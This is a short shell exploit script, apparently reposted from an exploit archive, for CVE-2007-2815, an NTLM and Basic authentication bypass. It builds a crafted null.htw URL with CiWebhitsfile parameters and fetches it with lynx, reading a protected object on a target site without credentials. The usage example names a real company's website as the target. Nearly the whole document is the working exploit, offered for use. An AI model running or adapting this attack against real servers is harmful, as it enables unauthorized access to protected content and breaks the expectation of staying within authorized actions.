Rated as : Critical
#!/bin/sh
#
# NTLM && BASIC AUTH BYPASS :)
#
# sha0[at]badchecksum.net
# Based on my adv: http://www.securityfocus.com/bid/24105/info
(CVE-2007-2815)
if [ $# != 2 ]
then
printf "USAGE:tt$0 <Site> <Protected
Object>nExample:t$0 http://www.microsoft.com
/en/us/default.aspxnn";
exit 0
fi
site=$1
protectedObject=$2
evil=$site'/shao/null.htw?CiWebhitsfile='$protectedObject'&CiRestriction=b&CiHiliteType=full'
lynx -dump $evil
securitydot.net - 2007-06-03
|